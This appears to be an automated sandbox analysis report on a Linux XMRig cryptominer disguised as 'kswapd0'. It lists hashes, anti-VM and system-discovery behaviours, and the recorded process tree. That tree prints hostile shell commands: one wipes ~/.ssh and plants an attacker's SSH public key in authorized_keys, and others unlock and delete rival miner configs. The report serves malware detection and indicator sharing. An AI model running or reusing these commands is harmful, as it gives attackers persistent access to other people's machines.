xmrig_linux | 083e706194a92aa96825007dbcbaff4f64a0200c77a70cde17974be6716886e6

Analysis

max time kernel
148s
max time network
150s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
31-07-2024 06:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kswapd0
Size

2.1MB
MD5

3b928d87be14aa661b14bb1c29636650
SHA1

f2b4bc2244ea8596a2a2a041308aa75088b6bbd5
SHA256

083e706194a92aa96825007dbcbaff4f64a0200c77a70cde17974be6716886e6
SHA512

f98f718fce0a1e6312c96ab74929a8c84cf5b720b0f2a4578e8fadb55d0d002f56f90b092a863fa1f5a99a5441fff583920b0e0e0ff34d28a7166d29446421bc
SSDEEP

49152:sexAtJHwlST44nnsrQTygWfeCD/AWgZYAIFtvXRPiD9mX:seVSTLsOyxD/rgZz4vpiD9mX

Score

10^/10

xmrig_linux antivm miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2471-1-0x0000000000400000-0x0000000000a6f078-memory.dmp	xmrig

Attempts to change immutable files 2 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
2475	chattr
2477	chattr

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	kswapd0

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_version	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/board_name	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id/board_version	kswapd0

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	kswapd0

Reads CPU attributes 1 TTPs 45 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/possible	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	kswapd0
File opened for reading	/sys/devices/system/cpu/online	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	kswapd0
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	kswapd0

Enumerates kernel/hardware configuration 1 TTPs 23 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/node/node0/access1/initiators	kswapd0
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	kswapd0
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	kswapd0
File opened for reading	/sys/devices/system/cpu	kswapd0
File opened for reading	/sys/devices/system/node/online	kswapd0
File opened for reading	/sys/devices/system/node/node0/hugepages	kswapd0
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	kswapd0
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	kswapd0
File opened for reading	/sys/firmware/dmi/tables/DMI	kswapd0
File opened for reading	/sys/fs/cgroup/cgroup.controllers	kswapd0
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	kswapd0
File opened for reading	/sys/devices/system/node/node0/cpumap	kswapd0
File opened for reading	/sys/devices/system/node/node0/meminfo	kswapd0
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	kswapd0
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	kswapd0
File opened for reading	/sys/devices/system/node/node0/access0/initiators	kswapd0
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	kswapd0
File opened for reading	/sys/devices/virtual/dmi/id	kswapd0
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	kswapd0
File opened for reading	/sys/kernel/mm/hugepages	kswapd0
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	kswapd0
File opened for reading	/sys/bus/dax/devices	kswapd0
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	kswapd0

Reads runtime system information 5 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/driver/nvidia/gpus	kswapd0
File opened for reading	/proc/self/exe	kswapd0
File opened for reading	/proc/mounts	kswapd0
File opened for reading	/proc/self/cpuset	kswapd0
File opened for reading	/proc/meminfo	kswapd0

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/cert_key.pem	kswapd0
File opened for modification	/tmp/cert.pem	kswapd0

/tmp/kswapd0
/tmp/kswapd0
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:2471
- /bin/sh
  sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  2⤵
  PID:2473
- /bin/sh
  sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"
  2⤵
  PID:2474
- - /usr/bin/chattr
    chattr -ia "~/.xmrig.json"
    3⤵
    - Attempts to change immutable files
    PID:2475
- - /usr/bin/rm
    rm -rf "~/.xmrig.json"
    3⤵
    PID:2476
- - /usr/bin/chattr
    chattr -ia "~/.config/xmrig.json"
    3⤵
    - Attempts to change immutable files
    PID:2477
- - /usr/bin/rm
    rm -rf "~/.config/xmrig.json"
    3⤵
    PID:2478

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/cert_key.pem

Filesize
1KB

MD5
24a7512cf3d1ac352bdfad5683e425d5

SHA1
39cbea6689b1beabd379ba3fa369278f1bb08e7e

SHA256
cfb89a2b6ac33c438686ccd4acfb7bbfe1809f7f1da2934069cc04891c1ebb78

SHA512
0c4b8c333d0168fa76d4e9af2d65d3c2618427f10ec420a6d0aedf8b2ece3a13bd6e744e5ef5b2d713d4236419a21a72948a321287fd0525f7239b6f51c74402

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads